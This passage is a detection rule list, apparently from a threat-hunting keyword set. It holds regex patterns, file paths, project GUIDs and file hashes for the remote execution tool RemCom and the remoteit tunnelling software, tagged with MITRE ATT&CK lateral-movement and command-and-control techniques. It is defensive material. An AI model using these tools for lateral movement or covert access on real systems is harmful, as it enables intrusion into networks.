\""C:\\InstallMe.bat*",".{0,1000}\s\\\\\\\\localhost\s\/user\:Username\s\/pwd\:Password\s\s\\\""C\:\\\\InstallMe\.bat.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "* RemCom.exe*",".{0,1000}\sRemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "* RemComSvc.exe*",".{0,1000}\sRemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "* RemComSvc.h*",".{0,1000}\sRemComSvc\.h.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*.\RemComSvc\*",".{0,1000}\.\\RemComSvc\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*/RemCom.exe*",".{0,1000}\/RemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*/RemCom.git*",".{0,1000}\/RemCom\.git.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" 
"*/RemComSvc.exe*",".{0,1000}\/RemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*[ talha.tariq@gmail.com ]*",".{0,1000}\[\stalha\.tariq\@gmail\.com\s\].{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemCom.cpp*",".{0,1000}\\RemCom\.cpp.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemCom.exe*",".{0,1000}\\RemCom\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemCom.pdb*",".{0,1000}\\RemCom\.pdb.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemCom.vcxproj*",".{0,1000}\\RemCom\.vcxproj.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS 
replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemCom-master\*",".{0,1000}\\RemCom\-master\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemComSvc.exe*",".{0,1000}\\RemComSvc\.exe.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\RemComSvc\*",".{0,1000}\\RemComSvc\\.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*\Remote Command Executor.sln*",".{0,1000}\\Remote\sCommand\sExecutor\.sln.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*0d8f28ea01d3866ad7ee4abbdc5bdfd83d41702dcf029584ef30cb0055be8538*",".{0,1000}0d8f28ea01d3866ad7ee4abbdc5bdfd83d41702dcf029584ef30cb0055be8538.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement 
for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#filehash","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*29548EB7-5E44-21F9-5C82-15DDDC80449A*",".{0,1000}29548EB7\-5E44\-21F9\-5C82\-15DDDC80449A.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*8CC59FFA-00E0-0AEA-59E8-E780672C3CB3*",".{0,1000}8CC59FFA\-00E0\-0AEA\-59E8\-E780672C3CB3.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*C7038612-8183-67A7-8A9C-1379C2674156*",".{0,1000}C7038612\-8183\-67A7\-8A9C\-1379C2674156.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#GUIDproject","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*define RemComSVCEXE*",".{0,1000}define\sRemComSVCEXE.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" 
"*eee20962a1056f525bbe1c99c656794511697e510221522e7d62efd943457190*",".{0,1000}eee20962a1056f525bbe1c99c656794511697e510221522e7d62efd943457190.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","#filehash","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*kavika13/RemCom*",".{0,1000}kavika13\/RemCom.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","1","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*RemCom - Win32 Debug*",".{0,1000}RemCom\s\-\sWin32\sDebug.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*RemCom - Win32 Release*",".{0,1000}RemCom\s\-\sWin32\sRelease.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*RemComSvc - Win32 Debug*",".{0,1000}RemComSvc\s\-\sWin32\sDebug.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "*RemComSvc - Win32 Release*",".{0,1000}RemComSvc\s\-\sWin32\sRelease.{0,1000}","greyware_tool_keyword","RemCom","Remote Command Executor: A OSS replacement for PsExec and RunAs","T1077 - T1059 - T1021 - T1569.002","TA0002 - TA0005 - TA0008","N/A","N/A","Lateral Movement","https://github.com/kavika13/RemCom","1","0","N/A","N/A","10","4","335","94","2017-10-30T04:48:38Z","2011-11-09T11:00:09Z" "* remoteit.exe*",".{0,1000}\sremoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "* remoteit.x86-win.exe*",".{0,1000}\sremoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "* remoteit-desktop.exe*",".{0,1000}\sremoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/Applications/remoteit.app/*",".{0,1000}\/Applications\/remoteit\.app\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/bin/x64/connectd.exe*",".{0,1000}\/bin\/x64\/connectd\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/connectd.aarch64-win.exe*",".{0,1000}\/connectd\.aarch64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/connectd.x86_64-win.exe*",".{0,1000}\/connectd\.x86_64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/etc/remoteit/*",".{0,1000}\/etc\/remoteit\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/opt/remoteit/remoteit*",".{0,1000}\/opt\/remoteit\/remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/Remote.It-Installer-*",".{0,1000}\/Remote\.It\-Installer\-.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/remoteit.exe*",".{0,1000}\/remoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/remoteit.x86-win.exe*",".{0,1000}\/remoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/remoteit/connectd/releases*",".{0,1000}\/remoteit\/connectd\/releases.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*/remoteit/desktop*",".{0,1000}\/remoteit\/desktop.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/remoteit-desktop.exe*",".{0,1000}\/remoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*/systemd/system/connectd.service*",".{0,1000}\/systemd\/system\/connectd\.service.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*/usr/bin/connectd*",".{0,1000}\/usr\/bin\/connectd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*/usr/bin/logger logger ""connectd installer postinst*",".{0,1000}\/usr\/bin\/logger\slogger\s\""connectd\sinstaller\spostinst.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*/usr/share/connectd/scripts/*",".{0,1000}\/usr\/share\/connectd\/scripts\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*/var/log/remoteit*",".{0,1000}\/var\/log\/remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\AppData\Local\remoteit*",".{0,1000}\\AppData\\Local\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\connectd.aarch64-win.exe*",".{0,1000}\\connectd\.aarch64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\connectd.x86_64-win.exe*",".{0,1000}\\connectd\.x86_64\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to 
internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\Program Files\remoteit*",".{0,1000}\\Program\sFiles\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\ProgramData\remoteit*",".{0,1000}\\ProgramData\\remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\Remote.It-Installer-*",".{0,1000}\\Remote\.It\-Installer\-.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\remoteit.exe*",".{0,1000}\\remoteit\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\remoteit.log*",".{0,1000}\\remoteit\.log.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\remoteit.x86-win.exe*",".{0,1000}\\remoteit\.x86\-win\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\remoteit-desktop.exe*",".{0,1000}\\remoteit\-desktop\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*\remoteit-headless.service*",".{0,1000}\\remoteit\-headless\.service.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*>Remote.it<*",".{0,1000}\>Remote\.it\<.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*00caf6dfcf353f66ed5c3937d8d12fcef79c27a845fea644c75ff9f3bfd27eec*",".{0,1000}00caf6dfcf353f66ed5c3937d8d12fcef79c27a845fea644c75ff9f3bfd27eec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*013166fb62f933f2af2d9c1cc8207b66cb8e693814cdaa6d242e221be0a2fff2*",".{0,1000}013166fb62f933f2af2d9c1cc8207b66cb8e693814cdaa6d242e221be0a2fff2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*0149c7275232b058c1da45542ec522561c8895a65ec6bc1422ee3c07a1276110*",".{0,1000}0149c7275232b058c1da45542ec522561c8895a65ec6bc1422ee3c07a1276110.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*03b738de271f354a0aa9c1773c4561b736fc03991008778a50a352a54bfa111b*",".{0,1000}03b738de271f354a0aa9c1773c4561b736fc03991008778a50a352a54bfa111b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*04972d8a2dab86aca68eed06eaec968025915df802e31c0f4db8e8baad010a2b*",".{0,1000}04972d8a2dab86aca68eed06eaec968025915df802e31c0f4db8e8baad010a2b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*05852ffa6c718d4d63489c966ba8dcc8109de75c7390a6ef5fc1c8f1644a7ab1*",".{0,1000}05852ffa6c718d4d63489c966ba8dcc8109de75c7390a6ef5fc1c8f1644a7ab1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*058711652c885c5765e5bcc0b693c6861d3bcca0305474cc9da635a04898c954*",".{0,1000}058711652c885c5765e5bcc0b693c6861d3bcca0305474cc9da635a04898c954.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0703f542c4dd1cdde9535cc7552b3bdb2a862904690d7e27f8c61a19f84fc4f1*",".{0,1000}0703f542c4dd1cdde9535cc7552b3bdb2a862904690d7e27f8c61a19f84fc4f1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*07c29c4df1a2616348871ffd8ca04f3774243980bec8e37f093fe8c0b56cff9e*",".{0,1000}07c29c4df1a2616348871ffd8ca04f3774243980bec8e37f093fe8c0b56cff9e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*07cc0dbf5aedfcbba76d61e72e346b2631868e6bd200efdbec214d85a75417f5*",".{0,1000}07cc0dbf5aedfcbba76d61e72e346b2631868e6bd200efdbec214d85a75417f5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*07f70bf5e1e41d3ad989824ccd3eb652dd4f30d151aab605c01a05b9db74a2df*",".{0,1000}07f70bf5e1e41d3ad989824ccd3eb652dd4f30d151aab605c01a05b9db74a2df.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*0a348d00ff8925287a5fb696c5dd5e4f66c4d8fad6f2a19597acd9dc856f15c5*",".{0,1000}0a348d00ff8925287a5fb696c5dd5e4f66c4d8fad6f2a19597acd9dc856f15c5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0a6890a6e321fa795e960c77d09bebf620dba250274fb16fa59f1694cb2109bf*",".{0,1000}0a6890a6e321fa795e960c77d09bebf620dba250274fb16fa59f1694cb2109bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0b6e3bb9babf35f1580de0b32ba27a13e5187dfd5a66c6694e2e4713c49c0532*",".{0,1000}0b6e3bb9babf35f1580de0b32ba27a13e5187dfd5a66c6694e2e4713c49c0532.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 